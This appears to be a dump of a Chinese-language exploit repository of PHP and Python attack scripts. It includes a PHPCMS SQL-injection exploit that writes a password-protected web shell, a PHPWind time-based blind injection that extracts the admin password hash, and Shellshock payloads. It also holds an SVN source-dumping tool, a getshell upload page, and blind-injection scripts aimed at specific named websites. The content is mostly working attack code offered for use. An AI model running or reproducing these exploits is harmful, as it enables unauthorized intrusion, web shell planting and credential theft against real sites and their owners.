$key : ''); 112 | $keya = md5(substr($key, 0, 16)); 113 | $keyb = md5(substr($key, 16, 16)); 114 | $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ''; 115 | 116 | $cryptkey = $keya.md5($keya.$keyc); 117 | $key_length = strlen($cryptkey); 118 | 119 | $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string; 120 | $string_length = strlen($string); 121 | 122 | $result = ''; 123 | $box = range(0, 255); 124 | 125 | $rndkey = array(); 126 | for($i = 0; $i <= 255; $i++) { 127 | $rndkey[$i] = ord($cryptkey[$i % $key_length]); 128 | } 129 | 130 | for($j = $i = 0; $i < 256; $i++) { 131 | $j = ($j + $box[$i] + $rndkey[$i]) % 256; 132 | $tmp = $box[$i]; 133 | $box[$i] = $box[$j]; 134 | $box[$j] = $tmp; 135 | } 136 | 137 | for($a = $j = $i = 0; $i < $string_length; $i++) { 138 | $a = ($a + 1) % 256; 139 | $j = ($j + $box[$a]) % 256; 140 | $tmp = $box[$a]; 141 | $box[$a] = $box[$j]; 142 | $box[$j] = $tmp; 143 | $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256])); 144 | } 145 | 146 | if($operation == 'DECODE') { 147 | if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) { 148 | return substr($result, 26); 149 | } else { 150 | return ''; 151 | } 152 | } else { 153 | return $keyc.str_replace('=', '', base64_encode($result)); 154 | } 155 | 156 | } 157 | 158 | $SQL = "time=999999999999999999999999&ids=1'&action=deleteuser"; 159 | $SQL = urlencode(authcode($SQL, "ENCODE", "")); 160 | echo "[1] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n"; 161 | $packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." 
HTTP/1.0\r\n"; 162 | $packet.="User-Agent: Mozilla/5.0\r\n"; 163 | $packet.="Host: ".$host."\r\n"; 164 | $packet.="Connection: Close\r\n\r\n"; 165 | send($packet); 166 | if(strpos($html,"MySQL Errno") > 0){ 167 | echo "[2] 发现存在SQL注入漏洞"."\n"; 168 | echo "[3] 访问 http://".$host.$p."phpsso_server/api/logout.php \n"; 169 | $packet ="GET ".$p."phpsso_server/api/logout.php"." HTTP/1.0\r\n"; 170 | $packet.="User-Agent: Mozilla/5.0\r\n"; 171 | $packet.="Host: ".$host."\r\n"; 172 | $packet.="Connection: Close\r\n\r\n"; 173 | send($packet); 174 | preg_match('/[A-Za-z]?[:]?[\/\x5c][^<^>]+[\/\x5c]phpsso_server[\/\x5c]/',$html, $matches); 175 | //print_r($matches); 176 | if(!empty($matches)){ 177 | echo "[4] 得到web路径 " . $matches[0]."\n"; 178 | echo "[5] 尝试写入文件 ". str_replace("\\","/",$matches[0]) ."caches/shell.php"."\n"; 179 | $SQL = "time=999999999999999999999999&ids=1)"; 180 | $SQL.=" and 1=2 union select '' into outfile '". str_replace("\\","/",$matches[0]) ."caches/shell.php'#"; 181 | $SQL.="&action=deleteuser"; 182 | $SQL = urlencode(authcode($SQL, "ENCODE", "")); 183 | echo "[6] 访问 http://".$host.$p."phpsso_server/api/uc.php?code=".$SQL."\n"; 184 | $packet ="GET ".$p."phpsso_server/api/uc.php?code=".$SQL." HTTP/1.0\r\n"; 185 | $packet.="User-Agent: Mozilla/5.0\r\n"; 186 | $packet.="Host: ".$host."\r\n"; 187 | $packet.="Connection: Close\r\n\r\n"; 188 | send($packet); 189 | if(strpos($html,"Access denied") > 0){ 190 | echo "[-] MYSQL权限过低 禁止写入文件 :("; 191 | die; 192 | } 193 | echo "[6] 访问 http://".$host.$p."phpsso_server/caches/shell.php"."\n"; 194 | $packet ="GET ".$p."phpsso_server/caches/shell.php?a=phpinfo(); HTTP/1.0\r\n"; 195 | $packet.="User-Agent: Mozilla/5.0\r\n"; 196 | $packet.="Host: ".$host."\r\n"; 197 | $packet.="Connection: Close\r\n\r\n"; 198 | send($packet); 199 | if(strpos($html,"phpinfo()") > 0){ 200 | echo "[7] 测试phpinfo成功!shell密码是a ! 
enjoy it :)"; 201 | } 202 | }else{ 203 | echo "[-]未取到web路径 :("; 204 | } 205 | }else{ 206 | echo "[*]不存在SQL注入漏洞"."\n"; 207 | } 208 | 209 | ?> 210 | -------------------------------------------------------------------------------- /phpcms/php authkey加密构成.php: -------------------------------------------------------------------------------- 1 | 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) { 20 | return substr($result, 26); 21 | } else { 22 | return ''; 23 | } 24 | } 25 | } 26 | 27 | echo sys_auth('i=3&d=1&t=9999999999&ip=115.238.245.179&m=3&modelid=3&s=caches/configs/system.p&f=hp', 'ENCODE', '8fafb9a1932b309d809e6140772c661'); 28 | ?> 29 | -------------------------------------------------------------------------------- /phpweb/PHPWEB IIS网站管理系统后台Kedit编辑器漏洞利用代码.html: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/phpweb/PHPWEB IIS网站管理系统后台Kedit编辑器漏洞利用代码.html -------------------------------------------------------------------------------- /phpwind/PHPWIND_exp.php: -------------------------------------------------------------------------------- 1 | 126 )) 37 | {$result.=" .";} 38 | else 39 | {$result.=" ".$string[$i];} 40 | if (strlen(dechex(ord($string[$i])))==2) 41 | {$exa.=" ".dechex(ord($string[$i]));} 42 | else 43 | {$exa.=" 0".dechex(ord($string[$i]));} 44 | $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";} 45 | } 46 | return $exa."\r\n".$result; 47 | } 48 | $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)'; 49 | 50 | function sendpacketii($packet) 51 | { 52 | global $proxy, $host, $port, $html, $proxy_regex; 53 | if ($proxy=='') { 54 | $ock=fsockopen(gethostbyname($host),$port); 55 | if (!$ock) { 56 | echo 'No response from '.$host.':'.$port; 57 | } 58 | } 59 | else { 60 | $c = preg_match($proxy_regex,$proxy); 61 | if (!$c) { 62 | echo 'Not a valid proxy...';die; 63 | } 64 | 
$parts=explode(':',$proxy); 65 | echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n"; 66 | $ock=fsockopen($parts[0],$parts[1]); 67 | if (!$ock) { 68 | echo 'No response from proxy...';die; 69 | } 70 | } 71 | fputs($ock,$packet); 72 | if ($proxy=='') { 73 | $html=''; 74 | while (!feof($ock)) { 75 | $html.=fgets($ock); 76 | } 77 | } 78 | else { 79 | $html=''; 80 | while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) { 81 | $html.=fread($ock,1); 82 | } 83 | } 84 | fclose($ock); 85 | } 86 | 87 | $host=$argv[1]; 88 | $path=$argv[2]; 89 | $port=80; 90 | $proxy=""; 91 | for ($i=3; $i<$argc; $i++){ 92 | $temp=$argv[$i][0].$argv[$i][1]; 93 | if ($temp=="-p") 94 | { 95 | $port=str_replace("-p","",$argv[$i]); 96 | } 97 | if ($temp=="-P") 98 | { 99 | $proxy=str_replace("-P","",$argv[$i]); 100 | } 101 | } 102 | if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} 103 | if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;} 104 | 105 | echo "please wait...\n"; 106 | 107 | function StrCode($string,$action='ENCODE'){ 108 | $key = $GLOBALS['my_fragment']; 109 | $string = $action == 'ENCODE' ? $string : base64_decode($string); 110 | $len = 18; 111 | $code = ''; 112 | for($i=0; $i ".$cp."\n"; 151 | 152 | //see sql errors... you need a valid key for strcodeii() function, 153 | //so let's ask :) 154 | $tt="\t";for ($i=1; $i<=255; $i++){$tt.=chr($i);} 155 | while (1) 156 | { 157 | $GLOBALS['my_fragment']=random(18); 158 | $au=StrCode($tt,"ENCODE"); 159 | $packet ="GET ".$p."admin.php HTTP/1.0\r\n"; 160 | $packet.="CLIENT-IP: 999.999.999.999\r\n";//spoof 161 | $packet.="Host: ".$host."\r\n"; 162 | $packet.="Cookie: ".$cp."AdminUser=".$au.";\r\n"; 163 | $packet.="Accept: text/plain\r\n"; 164 | $packet.="Connection: Close\r\n\r\n"; 165 | sendpacketii($packet); 166 | $html=html_entity_decode($html); 167 | $html=str_replace("
","",$html); 168 | if ((eregi("WHERE username='",$html)) and (eregi("You Can Get Help In",$html))){ 169 | $temp=explode("WHERE username='",$html); 170 | $temp2=explode("'
",$temp[1]); 171 | $decoded=$temp2[0]; 172 | if (strlen($decoded)==255) break; 173 | } 174 | } 175 | 176 | $decoded="\t".$decoded; 177 | $temp = $au; 178 | 179 | //calculating key... 180 | $key=""; 181 | for ($j=0; $j<18; $j++){ 182 | for ($i=0; $i<255; $i++){ 183 | $aa=""; 184 | if ($j<>0){ 185 | for ($k=1; $k<=$j; $k++){ 186 | $aa.="a"; 187 | } 188 | } 189 | $GLOBALS['my_fragment']=$aa.chr($i); 190 | $t = StrCode($temp,"DECODE"); 191 | if ($t[$j]==$decoded[$j]){ 192 | $key.=chr($i); 193 | } 194 | } 195 | } 196 | 197 | function is_my_key($fragment) 198 | { 199 | if (ereg("^[a-f0-9]{18}",trim($fragment))) {return true;} 200 | else {return false;} 201 | } 202 | 203 | if (is_my_key($key)){ 204 | echo "encryption key ->".$key."\n"; 205 | $GLOBALS['my_fragment']=$key; 206 | } 207 | else 208 | {die("unable to retrieve the magic key...");} 209 | 210 | $chars[0]=0;//null 211 | $chars=array_merge($chars,range(48,57)); //numbers 212 | $chars=array_merge($chars,range(97,102));//a-f letters 213 | $j=1;$password=""; 214 | while (!strstr($password,chr(0))) 215 | { 216 | for ($i=0; $i<=255; $i++) 217 | { 218 | if (in_array($i,$chars)) 219 | { 220 | //you can use every char because of base64_decode()...so this bypass magic quotes... 
221 | $sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(password,".$j.",1))=".$i."),benchmark(1000000,sha1(\"suntzu\")),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*"; 222 | echo "sql -> ".$sql."\n"; 223 | $packet ="GET ".$p."admin.php HTTP/1.0\r\n"; 224 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 225 | $packet.="Host: ".$host."\r\n"; 226 | $packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n"; 227 | $packet.="Accept: text/plain\r\n"; 228 | $packet.="Connection: Close\r\n\r\n"; 229 | $packet.=$data; 230 | sendpacketii($packet); 231 | usleep(2000000); 232 | $starttime=time(); 233 | echo "starttime -> ".$starttime."\r\n"; 234 | sendpacketii($packet); 235 | $endtime=time(); 236 | echo "endtime -> ".$endtime."\r\n"; 237 | $difftime=$endtime - $starttime; 238 | echo "difftime -> ".$difftime."\r\n"; 239 | if ($difftime > 10) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;} 240 | } 241 | if ($i==255) { 242 | die("\nExploit failed..."); 243 | } 244 | } 245 | $j++; 246 | } 247 | 248 | $j=1;$admin=""; 249 | while (!strstr($admin,chr(0))) 250 | { 251 | for ($i=0; $i<=255; $i++) 252 | { 253 | $sql="9999999'/**/OR/**/(IF((ASCII(SUBSTRING(username,".$j.",1))=".$i."),benchmark(1000000,sha1(\"suntzu\")),-1))/**/AND/**/groupid=3/**/LIMIT/**/1/*"; 254 | echo "sql -> ".$sql."\n"; 255 | $packet ="GET ".$p."admin.php HTTP/1.0\r\n"; 256 | $packet.="CLIENT-IP: 1.2.3.4\r\n"; 257 | $packet.="Host: ".$host."\r\n"; 258 | $packet.="Cookie: ".$cp."AdminUser=".StrCode("9999999999\t".$sql,"ENCODE").";\r\n"; 259 | $packet.="Accept: text/plain\r\n"; 260 | $packet.="Connection: Close\r\n\r\n"; 261 | $packet.=$data; 262 | sendpacketii($packet); 263 | usleep(2000000); 264 | $starttime=time(); 265 | echo "starttime -> ".$starttime."\r\n"; 266 | sendpacketii($packet); 267 | $endtime=time(); 268 | echo "endtime -> ".$endtime."\r\n"; 269 | $difftime=$endtime - $starttime; 270 | echo "difftime -> ".$difftime."\r\n"; 271 | if ($difftime > 10) {$admin.=chr($i);echo 
"admin -> ".$admin."[???]\r\n";sleep(2);break;} 272 | if ($i==255) { 273 | die("\nExploit failed..."); 274 | } 275 | } 276 | $j++; 277 | } 278 | 279 | function is_hash($hash) 280 | { 281 | if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} 282 | else {return false;} 283 | } 284 | 285 | if (is_hash($password)) { 286 | print_r(' 287 | -------------------------------------------------------------------------------- 288 | admin user -> '.$admin.' 289 | pwd hash (md5) -> '.$password.' 290 | -------------------------------------------------------------------------------- 291 | '); 292 | } 293 | else { 294 | echo "exploit failed..."; 295 | } 296 | ?> 297 | 298 | 299 | -------------------------------------------------------------------------------- /phpwind/phpwind 5.0.1 Sql注射漏洞利用程序.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/phpwind/phpwind 5.0.1 Sql注射漏洞利用程序.php -------------------------------------------------------------------------------- /phpwind/phpwind5.x passport_client.php UPDATE SQL Injection POC.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/phpwind/phpwind5.x passport_client.php UPDATE SQL Injection POC.php -------------------------------------------------------------------------------- /php包含和代码执行写一句话.txt: -------------------------------------------------------------------------------- 1 | ";?> 2 | -------------------------------------------------------------------------------- /shellshock.txt: -------------------------------------------------------------------------------- 1 | User-Agent: () { ignored; }; echo Content-Type: text/plain ; echo ; echo ; /usr/bin/id; 2 | 3 | 4 | 会返回id 5 | 6 | 7 | 8 | 测试: 9 | 10 | 11 | curl -H 'User-Agent:() { :; }; echo -e "\r\nVul\r\n"' http://example.com/some-cgi/script.cgi 
12 | -------------------------------------------------------------------------------- /svn/svn.php: -------------------------------------------------------------------------------- 1 | #!/usr/bin/php -q 2 | 3 | $type) { 142 | 143 | if($type=='dir') { 144 | 145 | debug(">>> 进入 $file 目录\n", ALL); 146 | 147 | svn_clone($url.'/'.$file); 148 | 149 | debug("<<< 退出 $file 目录\n", ALL); 150 | 151 | } elseif($type=='file') { 152 | 153 | debug("*** 下载 $file 文件\n", ALL); 154 | 155 | fetch($url.'/.svn/text-base/'.$file.'.svn-base'); 156 | 157 | } 158 | 159 | } 160 | 161 | } 162 | 163 | 164 | 165 | #抓取并保存 166 | 167 | function fetch($text_base){ 168 | 169 | put($text_base, get($text_base)); 170 | 171 | } 172 | 173 | 174 | 175 | #带缓存的抓取 176 | 177 | function get($url) { 178 | 179 | $file = CACHE_DIR.'/'.chunk_split(substr(md5($url),0,6),2,'/').urlencode($url); 180 | 181 | $dir = dirname($file); 182 | 183 | if(!is_dir($dir)) { 184 | 185 | mkdir($dir,0777,true); 186 | 187 | } 188 | 189 | if(!file_exists($file)) { 190 | 191 | $content = file_get_contents($url) or debug("读取 {$url} 内容为空\n", WARNING); 192 | 193 | if($content) 194 | 195 | { 196 | 197 | file_put_contents($file, $content) or debug("写入 {$file} 内容为空\n", WARNING); 198 | 199 | } 200 | 201 | } else { 202 | 203 | $content = file_get_contents($file) or debug("读缓存 {$file} 内容为空\n", WARNING); 204 | 205 | } 206 | 207 | return $content; 208 | 209 | } 210 | 211 | 212 | 213 | #保存到数据目录 214 | 215 | function put($url, $content='') 216 | 217 | { 218 | 219 | $file = DATA_DIR.substr(strchr($url,'://'),2); 220 | 221 | $dir = dirname(dirname(dirname($file))); 222 | 223 | $file = basename($file,'.svn-base'); 224 | 225 | #看看你那什么有多长? 
226 | 227 | $len = strlen($content); 228 | 229 | if(!is_dir($dir)) { 230 | 231 | /* NOTE(review): 0777 leaves the data directory world-writable; 0755 is enough for a local mirror. $dir is derived from the remote URL, so unless the directory listing is filtered for '..' entries (that parsing is not visible here) a hostile server could steer the recursive mkdir outside DATA_DIR - confirm. */ mkdir($dir,0777,true); 232 | 233 | } 234 | 235 | debug("写入 $file 到 $dir ($len bytes)\n", ALL); 236 | 237 | file_put_contents($dir.'/'.$file, $content) or debug("写入 {$file} 内容为空\n", WARNING); 238 | 239 | } 240 | 241 | 242 | 243 | #Print a debug message 244 | 245 | /* Print $msg on stdout when $level is at or below VERBOSE; with USECOLOR the text is wrapped in an ANSI bold+colour escape chosen by level. NOTE(review): VERBOSE, USECOLOR and the level constants NONE/ERROR/WARNING/ALL/EGGACHE are presumably defined earlier in this file (not visible here). */ function debug($msg, $level=0) { 246 | 247 | #Colour codes 0:grey, 1:red, 2:green, 3:yellow, 4:blue, 5:magenta, 6:cyan, 7:white 248 | 249 | /* Level -> colour index; only the levels listed here have a colour, any other $level produces an undefined-key notice/warning from PHP. */ static $colors = array(NONE=>0, ERROR=>1, WARNING=>2, ALL=>3, EGGACHE=>4); 250 | 251 | /* NOTE(review): $msg is interpolated straight into printf's format string, so a '%' in the message - callers pass fetched URLs and file names through it - is read as a conversion directive; $color is never defined in this function and both trailing arguments are unused. Safer: printf("\033[1;3{$colors[$level]}m%s\033[m", $msg). */ VERBOSE>=$level && (USECOLOR?printf("\033[1;3{$colors[$level]}m$msg\033[m", $color, $msg):print $msg); 252 | 253 | } 254 | -------------------------------------------------------------------------------- /urp/urp_upload.html: -------------------------------------------------------------------------------- 1 |  2 | 3 | 习科联创urp getshell利用工具 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 30 | 33 | 34 | 35 | 36 | 37 | 40 | 41 | 42 | 63 | 64 |
Word版本号 23 | 29 | 31 | * 如果提交论文是Word类型,请选择版本号. 32 |
   38 | * 如果提交论文是latex类型,请上传.zip文件 39 |
43 | 44 | 45 | 60 | 61 |
46 |

请选择论文格式 47 | 48 | word 49 | 50 | latex 51 | 52 | pdf 53 |                     54 |

55 |

提交论文 56 | 57 |
58 |

59 |
62 |
65 | 66 | 67 | 68 |
69 | 习科联创网络信息安全论坛
70 | zippo
71 | 习科联创官方qq群:152834264
72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /二分法查找.py: -------------------------------------------------------------------------------- 1 | import urllib 2 | import urllib2 3 | def doinject(payload): 4 | url = 'xxxxxxxxxxxxxxxxxxxxx' 5 | values = {'injection':payload,'inject':'Inject'} 6 | data = urllib.urlencode(values) 7 | #print data 8 | req = urllib2.Request(url, data) 9 | req.add_header('cookie','xx=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx') 10 | response = urllib2.urlopen(req) 11 | the_page = response.read() 12 | if (the_page.find("Welcome back")>0): 13 | return True 14 | else: 15 | return False 16 | 17 | wordlist = "0123456789ABCDEF" 18 | res = "" 19 | for i in range(1,33): 20 | s=0 21 | t=15 22 | while (s\''+wordlist[m]+'\' -- LanLan'): 32 | s=m+1 33 | print wordlist[s]+":"+wordlist[t] 34 | else: 35 | t=m 36 | print wordlist[s]+":"+wordlist[t] 37 | res = res+wordlist[m] 38 | print res 39 | -------------------------------------------------------------------------------- /免杀360cve20144113/Win64.exe.lnk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/免杀360cve20144113/Win64.exe.lnk -------------------------------------------------------------------------------- /免杀360cve20144113/win32.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecWiki/exp/926d69f6f8fb46d09c465fdaf0a1ca8946df87a8/免杀360cve20144113/win32.exe -------------------------------------------------------------------------------- /延迟注入.py: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | 3 | import httplib 4 | 5 | import time 6 | 7 | import string 8 | 9 | import sys 10 | 11 | import random 12 | 13 | import urllib 14 | 15 | headers = { 16 | 17 | 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; 
Nexus S Build/GRK39F) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1', 18 | 19 | } 20 | 21 | payloads = list(string.ascii_lowercase) 22 | 23 | for i in range(0,10): 24 | 25 | payloads.append(str(i)) 26 | 27 | payloads += ['@','_', '.', '-', '\\', ' '] 28 | 29 | print 'Try to retrive user:' 30 | 31 | user = '' 32 | 33 | for i in range(1,11): 34 | 35 | for payload in payloads: 36 | 37 | try: 38 | 39 | conn = httplib.HTTPConnection('www.h-h.com.cn', timeout=5) 40 | 41 | s = "if (ascii(substring(system_user,%s,1))=%s) waitfor delay '0:0:5' --" % (i, ord(payload)) 42 | 43 | params = "id=74;" + urllib.quote(s) 44 | 45 | conn.request(method='GET', url= '/visa/view_visa.aspx?' + params, 46 | 47 | headers = headers) 48 | 49 | html_doc = conn.getresponse().read() 50 | 51 | conn.close() 52 | 53 | print '+', 54 | 55 | except Exception, e: 56 | 57 | user += payload 58 | 59 | print '\n[*]', user 60 | 61 | break 62 | 63 | print '\n[Done] User is:', user 64 | -------------------------------------------------------------------------------- /盲注.py: -------------------------------------------------------------------------------- 1 | #encoding=utf-8 2 | 3 | import time 4 | 5 | import string 6 | 7 | import sys 8 | 9 | import random 10 | 11 | import urllib 12 | 13 | import urllib2 14 | 15 | data={} 16 | 17 | def http_conn(url): 18 | 19 | url_test='http://web3.17500.cn/800/nr.php?id=27'+url#添加网址 20 | 21 | req=urllib2.urlopen(url_test) 22 | 23 | html_doc=req.read() 24 | 25 | if html_doc.find('2010069')>0: 26 | 27 | return True 28 | 29 | else: 30 | 31 | return False 32 | 33 | database='c' 34 | 35 | payloads=list('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.') 36 | 37 | for i in range(2,10,1): 38 | 39 | for payload in payloads: 40 | 41 | url=" and left(database(),%s)='%s' " % (i,(database+payload)) 42 | 43 | print url 44 | 45 | if http_conn(url)==True: 46 | 47 | database+=payload 48 | 49 | print 'current database:'+database 50 | 51 | break 
--------------------------------------------------------------------------------